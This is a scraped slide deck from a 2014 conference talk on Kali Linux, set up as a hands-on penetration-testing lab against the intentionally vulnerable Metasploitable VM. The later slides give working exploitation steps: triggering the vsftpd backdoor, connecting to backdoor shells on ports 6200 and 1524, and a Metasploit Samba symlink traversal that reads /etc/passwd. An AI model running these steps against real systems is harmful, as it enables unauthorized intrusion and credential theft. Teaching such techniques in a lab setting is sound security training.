1.1k likes | 1.7k Views
Kali Linux. Presentation on Kali Linux Ohio HTCIA 2014 Spring Conference Salt Fork Lodge. Welcome – Salt Fork 2014.
E N D
Kali Linux Presentation on Kali Linux Ohio HTCIA 2014 Spring Conference Salt Fork Lodge
Tony Godfrey is the CEO / Linux Consultant of Falconer Technologies (est 2003) specializing in Linux. He has written several articles on the body of knowledge of security administration, is a regular contributor to a variety of Linux publications, and has written technical content for Linux education nation-wide at the college level. He also teaches topics covering Linux, Network Security, Cisco routers, Cybercrime and System Forensics. Welcome
Kali the mother goddess despite her fearful appearance, protects the good against the evil. Unlike the other Hindu deities her form is pretty scary and formidable, intended to scare away the demons both literally and figuratively! Anu Yadavalli Who is Kali?
Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux distribution. What is Kali Linux?
/books • Official Kali Guide • eForensics • /media • 7-Zip, kali_iso, SD_formatter, Unetbootin, USB_installer, VMware, Win32_DiskImager • /metaspolitable • /PPT What’s on the DVD?
We’re going to type something We’re going to make a note Might be a question? We’re going to click on something Recon Attack Legend
- Let’s make a folder called kali_2014 - Copy the DVD contents into that folder - Install 7-Zip - Install VMware Player Let’s make sure the virtual environments are working and can ‘ping’ each other Getting Ready…
Press <CTRL><Alt> at the same time to be released from the current virtual environment. You can then do a normal <Alt><Tab> to toggle between different applications. VMware Player
Kali Login root Kali Password password Metaspolitable Login msfadmin Metaspolitable Password msfadmin Logins / Passwords
Login msfadmin • Password msfadmin ifconfig • Jot down the IP & Netmask route • Jot down the Gateway Metaspolitable V/E
Virtual Environment #1 • Metaspolitable Go to TERMINAL rlogin –l root <IP Address> cd /tmp ls -l ...vs... ls -la rm .X0-lock startx Metaspolitable V/E
Login root • Password password ifconfig • Jot down the IP & Netmask route • Jot down the Gateway Kali V/E
Go to: Applications System Tools Preferences System Settings Display Resolution: ____ Then…[Apply] Kali V/E
From the command line, type apt-get update && apt-get upgrade Note: This has already been done to save time, but should be done after a new installation. Kali Updating
Top 10 Security Tools Information Gathering Vulnerability Analysis Web Applications Password Attacks Wireless Attacks Exploitation Tools Sniffing/Spoofing Maintaining Access Reverse Engineering Stress Testing Hardware Hacking Forensics Reporting Tools System Services There are several categories
Command Line Tools Presentation on Kali Linux
ping Packet InterNet Groper Port = 8 Establishes physical connectivity between two entities (from Kali) ping <Target IP> Did it echo back? ping
top Tells us what services are running, processes, memory allocation Basically, a live system monitor top
df Tells us how much space is available or ‘disk free’ df
du Tells us how much space is taken or ‘disk used’. You can get a shorter report by… ‘du –s’ … (disk used –summary) du
free How much ‘free’ memory is available free
ls This is for ‘list’ ls –l (list –long) ls -la (list – long – all attributes) ls
pwd Directory structure Means ‘path to working directory’ or ‘print working directory’ pwd
ps • Means ‘Process Status’ • aux – auxiliary view • pstree – shows parent/child relationships • Windows – tasklist / taskkill Kill - Stops a process (ex: kill PID) ps / ps aux / pstree
Both Environments Presentation on Kali Linux
Virtual Environment #1 (Metaspolitable) • Go to TERMINAL • ifconfig • …jot this number down… • Virtual Environment #2 (Kali) • Go to TERMINAL • ifconfig • …jot this number down… Can you ‘ping’ each other?
CLI & Services Presentation on Kali Linux
traceroute Essentially, ‘tracert’ in Windows traceroute –i eth0 <Target IP> It displays the route (path) and measuring transit delays of packets across an Internet Protocol (IP) network traceroute
nmap –p0-65535 <Target IP> | less A security scanner used to discover hosts and services on a computer network, thus creating a "map" of the network nmap
nmap –sS –Pn –A <Target IP> A security scanner used to discover hosts and services on a computer network – ‘sS’ is stealth scan, ‘Pn’ not to run a ping scan, and ‘A’ is O/S detection, services, service pack. nmap
rlogin –l root <Target IP> whoami tcpdump -i eth0 host <Target IP> A packet analyzer that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached. rlogin (from Metaspolitable)
rpcinfo –p <Target IP> A utility makes a Remote Procedure Call (RPC) to an RPC server and reports what it finds. It lists all programs registered with the port mapper on the specified host. rpcinfo
showmount –e <Target IP> showmount –a <Target IP> It displays a list of all clients that have remotely mounted a file system from a specified machine in the Host parameter. This information is maintained by the [mountd] daemon on the Host parameter. showmount
telnet <Target IP> 21 After '220...' user backdoored:) <CTRL><]> quit Port 20/21 is FTP telnet
telnet <Target IP> 6200 After 'Escape character...', id; <CTRL><]> quit Port 6200 - Oracle Notification Service remote port Oracle Application Server telnet
telnet <Target IP> 6667 IRC (Internet Relay Chat) Many trojans/backdoors also use this port: Dark Connection Inside, Dark FTP, Host Control, NetBus worm , ScheduleAgent, SubSeven, Trinity, WinSatan, Vampire, Moses, Maniacrootkit, kaitex, EGO. telnet
telnet <Target IP> 1524 After 'root@meta....', id Many attack scripts install a backdoor shell at this port (especially those against Sun systems via holes in sendmail and RPC services like statd, ttdbserver, and cmsd). Connections to port 600/pcserver also have this problem. Note: ingreslock, Trinoo; talks UDP/TCP. telnet
smbclient –L <//Target IP> msfconsole ...wait, wait, wait..., then use auxiliary/admin/smb/samba_symlink_traversal set RHOST <Target IP> set SMBSHARE tmp smbclient
exploit ...Connecting to the server..... ...<yadda, yadda, yadda>... ...Auxiliary module.... At the prompt, type exit smbclient
smbclient //<Target IP>/tmp Do you get the 'smb: \>' prompt? cd rootfs cd etc more passwd Do you get a list of all user accts? smbclient